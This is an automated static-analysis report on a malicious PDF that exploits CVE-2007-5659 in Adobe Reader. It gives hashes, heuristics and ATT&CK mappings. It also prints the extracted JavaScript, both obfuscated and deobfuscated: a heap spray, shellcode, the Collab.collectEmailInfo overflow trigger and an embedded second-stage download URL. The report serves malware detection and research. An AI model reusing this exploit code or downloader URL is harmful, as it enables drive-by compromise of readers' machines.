Malicious PDF — malware analysis report

Static analysis result for SHA-256 733a4028cc14802d…

MALICIOUS

PDF

4.7 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12)
MD5: 3cb01709089909d3e774c7ce4dbf494f SHA-1: 7d6e9a683392ff1bb12d54a6c2c09e7557d5ac67 SHA-256: 733a4028cc14802ddff204d6d751fcc7f319bea17b8978c2ce828c72cfac2fe8
290 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits CVE-2007-5659 in Adobe Reader. The deobfuscated JavaScript contains a URL, http://abb192.cn/spl2/load.php?id=6115&spl=4, which is likely used to download and execute a second-stage payload. The ML classifier strongly indicates maliciousness.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/spl2/load.php?id=6115&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js
608fe18f81270349609c335157eb37b33a42473ad21e6856eda07406a844d213		 pdf-javascript-stream PDF /JS object 13 at offset 0x36A 6486 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function m6HCwdmaXX0a(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function n275XUq2(W6xxum287xfLD){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(W6xxum287xfLD)"+";"+"}");eval("function gdcB8HqNfu(MdV6WUF0L){var orBxnB="+"0,FVdrUBAKYUsB=MdV6WUF0L.l"+"en"+"gth,DIOuf=10"+"2"+"4,HITSoZyIo8d4v,vndsxxQRqbY,twpZ1erU7f46x='',Tbv9kcv=orBxnB,VsLvJCWs7=orBxnB,zwzpaqJgWNmTG=orBxnB,DC9pp=Ar"+"ra"+"y(63,14,37,57,55,54,26,62,5,41,0,0,0,0,0,0,15,6,29,39,36,3,20,8,13,22,56,31,2,24,45,27,42,28,35,33,30,7,46,43,52,11,16,0,0,0,0,60,0,59,58,32,17,1,10,0,44,50,34,25,21,53,19,48,9,38,23,4,40,18,49,51,47,12,61);f"+"o"+"r(vndsxxQRqbY=M"+"at"+"h.c"+"ei"+"l(FVdrUBAKYUsB/"+"DIOuf)"+";vndsxxQRqbY>orBxnB;vndsxxQRqbY-"+"-){fo"+"r(HITSoZyIo8d4v=Ma"+"th.m"+"in(FVdrUBAKYUsB,DIOuf);HITSoZyIo8d4v>orBxnB;HITSoZyIo8d4v-"+"-,FVdrUBAKYUsB-"+"-){zwzpaqJgWNmTG|"+"=(DC9pp[MdV6WUF0L.cha"+"rCod"+"eAt(Tbv9kcv+"+"+)-48])<"+"<VsLvJCWs7;if(VsLvJCWs7){twpZ1erU7f46x+"+"=n275XUq2"+"(86^zwzpaqJgWNmTG&"+"2"+"5"+"5);zwzpaqJgWNmTG>"+">="+"8;VsLvJCWs7-"+"="+"2;}el"+"se{VsLvJCWs7="+"6"+";}}"+"}return (twpZ1erU7f46x);}var oKwYFGk=implode('',['5eiH','DMUs0tn','8Ey','jY','q','X','v','12kjB','WkU1wsjBrZLp4_jK','0m','qBoyL1mGi@3cRB2MqybJwA','7voEJFRAMMIpeon','HTZgAbk4','eKZo1myd1s','Xv','kXJi1K_CBNMrG7_','R1wMCKy_g1mteAql','ug_','F','RU','sc','eTbyE1vGj@','_d','q6U_eeaFws3Z','ZUCdRYa','_vK','N','ooEJFRAMMIpeonHTZgA5m','4','65voEJ','FRAMMIpeonHTZgA','NNjBy_g1mte','Aqlug_FRU','scSB','WkUE@','cnH6cSk2sg@','m','J','eeM','crp','RZnpjZi@JsRKq94','eKZo','1my','d1sXvkXJi1K','DUk0mqB','Dy','RGR','ZL','15voE','JF','RAM','MIp','eon','HT','ZgAN','k4f','5','ewGJFRG0','DE159ns2ZcGuDnkSmS','1','7z','CB','NMUG4Zj','B@GdMS','BdA1sLkat','RBWkCkVMIHqlRkmMIHNk','U','G4ZjBEhwMR','zgA5NqBRcwy2FwHqyRKXH4GjlqM','2H4GjlqM2','H4GjlqM','2H4Gq','evsFy4G2l5M','F','y4','GceI8xH4GVkA8xH4GVk','qk','CH4Gn','gdk2H4GnZqM2H','4G','nZ','esry','4GnJqk','RH4GZg','v','sly4GZ','gesZy','4GVddMZy4Gu','gSMny','4GngvsZy','4Gcp5sZy4GnF','58Zy','4GxeeM','jH4GjdAs','2H4','G','xeeM','jH4GcHv','sSH4Gn','gSk','2H4Gng','vsFy','4G','cp5sZy4GF_','qk2H','4','GcB','qOSH4GnQ58CH4Gq8qk2H4GngvkCH4GngvsZy4GrQeMc','H4GF','_5sFy4GS8qOSH4','GcH5kCH4Gq','85sCH4GngvkZ','y','4GngvsZy4GrQeM','cH4','GF_5','sS','H4GlQSOSH','4GCk5','MZy4Gq8','Akuy4Gng','Sk','uy4GngvsZy4GrQeMcH4GF_5s2H4G','q','k','qO','SH4','GqeekCH4G','q8qO','Z','y','4GngdkFy4Gng','vsZy','4','GrQeM','c','H4GF_AsZy4G','DHSOSH4GqBvOc','H4','Gq8','5','MSH4G','ngekxH4','G','n','gv','sZy','4GrQeMcH4G','rge','sFy','4Gu','sAMZy4GxBek','ly4Gce5k','RH4GZs58ry4GnJqkcH','4Gngvs','ny4GFQ','5sZy4G','xBeMc','H4GcpI8F','y4Gn','Zv','8','ry','4GnySO','RH4Gc','pA8cH4GZsA8ry4Gq8A','8','x','H','4GngeMj','H4','Gngvs','Z','y4GV8A8Zy4GZyqsxH4Gxe','d8qH4G','S3qkSH','4Gn','gvsZy4Gce5sZy4GZ','F58r','y4','GDBeMjH','4G','Dee','Mly4GceA','8Zy','4Glgv8ry4GCkqOSH4GngvsZy4','GF','gv','sZy4GrQeMjH','4G','VH','As','Fy4','GFg','5suy4','GFQeMjH4Gq8As','SH','4G','ng','SOny4GngvsZy4Gr','Qvsly4GD','3I','8Zy4GFF5sZ','y4','G','lQ5','OCH','4GD3qOry4GnZv','8Zy','4GVBvOSH4','GngvsZy4GxBv','kqH4G','cp','I8Zy4G','nF5','8ry4Gny','SORH4Gc','pA','8cH','4GZsA8r','y','4GrgSk','S','H4','Gngv','sZy4G','VH','5s','Zy4GF','s5','sV','H4Gr','Q','vsly4G','uF','d8Fy4GFFdkjH4GCkA8ly4Gl','gvOry4GFFe8Zy4GrQeMjH4GVH','As2','H4GFg5sry4','GFQeM','jH4Gq8AsSH','4Gngd8ly4G','ngvsZy4GngSORH4Gx','BvkqH','4','Gc','pI8Z','y4Gns5','8r','y','4Gn','GS','O','RH','4GcpA8cH4GZ','sA8ry4G','ZgSk','SH4GngvsZy4GVH5sZy4Gc','p5','kqH4GZgv8','ry4','Gn','y','SORH4GcpA8c','H4','GZsA8ry4Gn','gSkSH4Gng','vsZ','y','4Gr','yvsZy4G','FGe8','jH4Gq','Hvsly4GqHvsly','4GqH','vsly4GqHvsl','y4Gq','lAM','ly','4G','Fy5sFy4GcpA8l','y4','GqpdkR','H4GFGvkVH','4Gqev','kq','H4GcpA8ry4G','cp','qk','2H4G','ns5ODH4GF','ZA','MjH4GF_5','s2H4Gx','l','eMjH4Gcpqs2','H4GZQ','5OFy4G','nF','vOSH4','GF_5kly4G','xzAMjH4GnFd','8Zy','4GuFv','kly4GrgAkcH4G','jd58n','y4','GDlvsly4','GuFe8','xH4','GnM5k','xH4GZ','g','v','MC','H4GCpSsRH','4Gns5OFy','4','GD','BA','k','ny4GnFv','s','DH4G','rgvkuy4','GCH','S','kjH4','GC
... (truncated)
generic_stage_recovery_000.js
460fa20a98a65a1675f1f9e89b8ca548de53484ccfe837bc364572c6c773c4ce		 deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x36A 2604 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var FilCUuxpKm3p = new Array(); function s0dlhM(ZYncLN0sWjcHRN, QIRmcEoRK1bxmI) { while (ZYncLN0sWjcHRN.length*2<QIRmcEoRK1bxmI){ZYncLN0sWjcHRN += ZYncLN0sWjcHRN;} ZYncLN0sWjcHRN = ZYncLN0sWjcHRN.substring(0,QIRmcEoRK1bxmI/2); return ZYncLN0sWjcHRN; } function lGsRtDo37Kl() { var YD77AOXw2ml = 0x0c0c0c0c; var Um55YN = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u732F%u6C70%u2F32%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3136%u3531%u7326%u6C70%u343D"); var CnLIPZOVjn = 0x400000; var VopRHwDL1mi = Um55YN.length * 2; var QIRmcEoRK1bxmI = CnLIPZOVjn - (VopRHwDL1mi+0x38); var ZYncLN0sWjcHRN = unescape("%u9090%u9090"); ZYncLN0sWjcHRN = s0dlhM(ZYncLN0sWjcHRN, QIRmcEoRK1bxmI); var WNfdu06Ujtp2IP = (YD77AOXw2ml - 0x400000)/CnLIPZOVjn; for (var deGdXTS=0;deGdXTS<WNfdu06Ujtp2IP;deGdXTS++) { FilCUuxpKm3p[deGdXTS] = ZYncLN0sWjcHRN + Um55YN; } } function N9Dro2hGIdTee() { var y4Fkjsft = app.viewerVersion.toString(); y4Fkjsft = y4Fkjsft.replace(/\D/g,""); var UcrzeA = new Array(y4Fkjsft.charAt(0),y4Fkjsft.charAt(1),y4Fkjsft.charAt(2)); if ((UcrzeA[0] == 8 && ((UcrzeA[1] == 1 && UcrzeA[2] < 2) || UcrzeA[1] < 1)) || (UcrzeA[0] == 7 && UcrzeA[1] < 1) || (UcrzeA[0] < 7)) { lGsRtDo37Kl(); var TyXIq = unescape("%u0c0c%u0c0c"); while(TyXIq.length < 44952) TyXIq += TyXIq; this.collabStore = Collab.collectEmailInfo({subj: "",msg: TyXIq}); } } N9Dro2hGIdTee();

Open this report in the interactive analyzer, or submit your own file for analysis.